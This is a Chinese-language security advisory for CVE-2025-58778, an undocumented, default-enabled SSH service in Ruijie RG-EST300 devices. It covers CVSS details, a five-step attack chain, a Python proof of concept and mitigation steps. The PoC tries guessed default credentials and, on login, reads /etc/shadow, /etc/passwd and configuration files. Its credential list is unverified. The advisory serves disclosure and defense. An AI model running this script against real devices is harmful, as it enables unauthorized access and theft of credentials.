CVE-2025-58778：Ruijie RG-EST300未文档化SSH服务导致未授权访问漏洞

漏洞信息

漏洞编号

CVE-2025-58778

漏洞类型

默认配置漏洞/未文档化功能暴露

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Ruijie Networks RG-EST300

漏洞概述

CVE-2025-58778是Ruijie Networks（锐捷网络）旗下RG-EST300系列设备存在的一个高危安全漏洞。该漏洞的核心问题在于设备出厂初始配置中默认启用了SSH服务器功能，但该功能并未在官方产品手册中进行明确说明和记录。这一安全设计缺陷导致设备在部署后即暴露SSH远程管理端口，任何知晓相关默认或可猜测凭证的攻击者均可通过网络远程登录受影响的设备。

成功利用该漏洞后，攻击者能够获取设备的完整管理权限，进而执行多种恶意操作，包括但不限于：读取设备的敏感配置信息（信息泄露）、修改系统配置参数（完整性破坏）、以及执行导致设备无法正常服务的操作（拒绝服务攻击）。该漏洞的CVSS 3.0评分为7.2分，属于高危级别，其攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要攻击者具备高权限凭证（PR:H），无需用户交互（UI:N），对机密性、完整性和可用性均产生高影响（C:H/I:H/A:H）。

该漏洞由JPCERT/CC的vultures团队发现并报告，于2025年10月16日正式公开披露。Ruijie Networks作为国内知名的网络设备厂商，其产品广泛应用于企业级网络环境，RG-EST300系列通常被部署于各种网络节点位置。一旦该漏洞被恶意利用，不仅可能导致单台设备失陷，还可能成为攻击者横向移动的跳板，对整个企业网络的安全性构成严重威胁。

技术细节

RG-EST300系列设备的SSH服务器功能在出厂初始配置中即处于启用状态，但该功能未在产品官方手册中予以记录或说明。这一设计缺陷违反了安全配置的最小化原则和透明性原则。

从技术层面分析，该漏洞的利用条件包括：
1. 设备已联网并暴露SSH端口（默认22端口）；
2. 攻击者已获取有效的登录凭证（可能为默认凭证、弱口令或通过其他途径获取的凭证）；
3. 网络可达性，攻击者能够通过网络与设备的SSH服务建立连接。

由于SSH服务默认启用且未文档化，系统管理员在日常运维中可能完全不知道该服务正在运行，因此不会对其进行安全加固，如修改默认端口、禁用root登录、配置防火墙规则限制访问源IP等。这使得设备在网络环境中长期处于暴露状态。

一旦攻击者成功通过SSH登录设备，便可获得与本地管理员等同的访问权限。在Linux/嵌入式设备环境中，SSH登录通常提供完整的Shell访问能力，攻击者可执行任意系统命令、读取配置文件、修改网络设置、提取存储的敏感信息（如其他设备的连接凭证），甚至植入后门程序或修改设备固件。由于该漏洞对机密性、完整性和可用性均有高影响，攻击者可造成设备完全失陷的严重后果。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过网络扫描工具（如Nmap）扫描目标网络，识别运行Ruijie RG-EST300设备的IP地址。由于SSH服务默认启用且未文档化，攻击者可通过22端口的开放情况快速定位受影响设备。

STEP 2

步骤2：获取凭证

攻击者通过社工手段、设备物理接触获取默认凭证，或利用其他途径（如数据泄露、暴力破解）获取有效的SSH登录凭证。

STEP 3

步骤3：SSH远程登录

使用获取的凭证通过SSH协议远程登录目标设备，建立加密的管理会话，获得与本地管理员等同的Shell访问权限。

STEP 4

步骤4：权限提升与信息窃取

登录成功后，攻击者可执行任意系统命令，读取设备配置文件、提取存储的敏感信息（如其他网络设备的连接凭证、VPN密钥等）。

STEP 5

步骤5：系统破坏或持久化

攻击者可修改设备配置导致网络中断（DoS）、植入后门程序实现持久化访问，或以该设备为跳板对内网其他目标进行横向移动攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-58778 - Ruijie RG-EST300 Undocumented SSH Service Exploitation
# This PoC demonstrates SSH connection to the affected device using known credentials

import paramiko
import socket
import sys
import time

def check_ssh_service(host, port=22, timeout=5):
    """Check if SSH service is running on the target device"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        sock.connect((host, port))
        banner = sock.recv(1024)
        sock.close()
        if b'SSH' in banner:
            print(f"[+] SSH service detected on {host}:{port}")
            print(f"[+] Banner: {banner.decode().strip()}")
            return True
        return False
    except Exception as e:
        print(f"[-] Error checking SSH service: {e}")
        return False

def exploit_ssh_access(host, port, username, password):
    """Attempt SSH login with known credentials"""
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        print(f"[*] Attempting SSH login to {host}:{port} with {username}:{password}")
        client.connect(host, port=port, username=username, password=password, timeout=10)
        print("[+] Login successful! Executing system commands...")
        
        # Execute information gathering commands
        commands = [
            'cat /etc/passwd',
            'cat /etc/shadow',
            'ifconfig',
            'cat /proc/version',
            'find / -name "*.conf" 2>/dev/null',
            'cat /etc/config/* 2>/dev/null'
        ]
        
        for cmd in commands:
            print(f"\n[*] Executing: {cmd}")
            stdin, stdout, stderr = client.exec_command(cmd)
            output = stdout.read().decode()
            print(output[:500])
        
        client.close()
        return True
    except paramiko.AuthenticationException:
        print("[-] Authentication failed")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    target_host = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"
    ssh_port = 22
    
    # Common default credentials for Ruijie devices
    credentials = [
        ("admin", "admin"),
        ("admin", "ruijie"),
        ("admin", "password"),
        ("root", "root"),
        ("admin", ""),
    ]
    
    print(f"[*] Targeting Ruijie RG-EST300 device at {target_host}")
    
    if check_ssh_service(target_host, ssh_port):
        for username, password in credentials:
            if exploit_ssh_access(target_host, ssh_port, username, password):
                print(f"\n[!] Successfully exploited CVE-2025-58778 with credentials: {username}/{password}")
                break
            time.sleep(1)
    else:
        print("[-] SSH service not detected on target")

影响范围

Ruijie RG-EST300 (多个版本)

Ruijie RG-EST300系列所有受影响的固件版本

防御指南

临时缓解措施

在等待官方安全补丁发布期间，建议采取以下临时缓解措施：1）通过网络ACL或防火墙规则限制设备SSH管理端口（默认22端口）的访问，仅允许可信管理主机的IP地址连接；2）立即修改设备的所有默认登录凭证，使用包含大小写字母、数字和特殊字符的强密码；3）如果业务允许，考虑临时禁用设备的SSH服务功能；4）部署网络入侵检测系统（NIDS）监控针对SSH服务的异常登录尝试和暴力破解行为；5）定期检查设备的SSH登录日志，发现可疑活动及时处置；6）对设备进行网络分段，将其放置在独立的VLAN或安全区域中，限制与其他网络的直接通信。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-58778
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-58778
3 Details https://www.cvedetails.com/cve/CVE-2025-58778/
4 VulDB https://vuldb.com/cve/CVE-2025-58778
5 Link https://jvn.jp/en/jp/JVN72648885/
6 Link https://www.ruijie.com.cn/gy/xw-aqtg-gw/929848/
7 Link https://www.ruijie.com/en-global/support/productLifecycle